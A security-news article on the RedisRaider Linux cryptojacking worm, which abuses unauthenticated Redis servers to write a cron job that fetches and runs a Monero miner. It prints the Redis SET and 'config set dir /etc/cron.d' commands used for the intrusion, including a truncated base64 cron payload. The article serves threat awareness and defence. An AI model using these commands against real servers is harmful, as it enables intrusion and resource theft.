A new sophisticated Linux cryptojacking campaign called RedisRaider has emerged, targeting vulnerable Redis servers across the internet.
This aggressive malware exploits misconfigured Redis instances to deploy cryptocurrency mining software, effectively turning compromised systems into digital mining farms for the attackers.
RedisRaider employs worm-like capabilities, continuously scanning across randomized portions of the IPv4 space to identify additional vulnerable targets, creating a self-propagating network of infected systems.
.png
)
The attack vector is particularly concerning as it leverages legitimate Redis configuration commands rather than exploiting software vulnerabilities.
By targeting publicly accessible Redis instances running without proper authentication or access controls, the attackers can manipulate the Redis configuration to execute arbitrary commands on the underlying Linux systems.
Once access is gained, the malware deploys a fork of the popular XMRig miner to generate Monero cryptocurrency for the attackers, consuming significant computational resources from victim systems.
DATADOG Security Labs researchers identified the campaign through their monitoring systems, noting unusual patterns of Redis configuration abuse appearing across multiple client environments.
The security team observed the malware’s unique persistence mechanisms and obfuscation techniques, which demonstrate considerable sophistication beyond typical opportunistic cryptojacking operations.
The impact of RedisRaider extends beyond resource theft, as the malware modifies system configurations and maintains persistence through cron jobs.
The attackers have implemented a multi-pronged approach to revenue generation, hosting not only server-side cryptojacking payloads but also web-based Monero miners on related infrastructure.
This indicates a coordinated effort by threat actors with experience in malware development and knowledge of Redis, Go programming, and Linux internals.
The attackers employ subtle anti-forensics measures, including short-lived keys with time-to-live (TTL) settings of just 120 seconds, making it difficult for defenders to detect and analyze the malicious activity after the fact.
These techniques suggest an evolution in cryptojacking tactics, moving from crude approaches to more sophisticated operations designed to maximize profits while minimizing detection.
Infection Mechanism Through Redis Configuration Manipulation
RedisRaider’s infection process begins by scanning for Redis instances exposed on the default port 6379.
Upon identifying a potential target, the malware issues the INFO command to verify that the Redis server is running on Linux.
If confirmed, the exploitation phase begins by using Redis’s SET command to create a key containing a base64-encoded shell script formatted as a cron entry:-
set t "*/1 * * * * root sh -c 'echo dT0iaHR0cDovL2EuaGJ3ZWIuaWN10jgwODAvdXBsb2Fkcy8yThe malware then manipulates Redis configurations with the following sequence of commands to write this content to the cron directory:-
config set dir "/etc/cron.d"
config set dbfilename "apache"
bgsaveThis redirects Redis’s database dump to /etc/cron.d/apache, where the cron scheduler will interpret it as a legitimate job and execute the embedded base64-encoded script.
The script, when decoded, downloads the main RedisRaider payload from the attacker’s infrastructure to /tmp/mysql, makes it executable, and launches it in the background using nohup to ensure persistence even if the parent process terminates.
The primary payload is heavily obfuscated using Garble, a compile-time obfuscator for Go.
It contains an embedded, packed version of the XMRig cryptocurrency miner which it unpacks at runtime, establishing a connection to mining pools to generate revenue for the attackers while continuously scanning for and infecting additional vulnerable Redis servers.
Equip your SOC team with deep threat analysis for faster response -> Get Extra 𝗦𝗮𝗻𝗱𝗯𝗼𝘅 𝗹𝗶𝗰𝗲𝗻𝘀𝗲𝘀 for Free
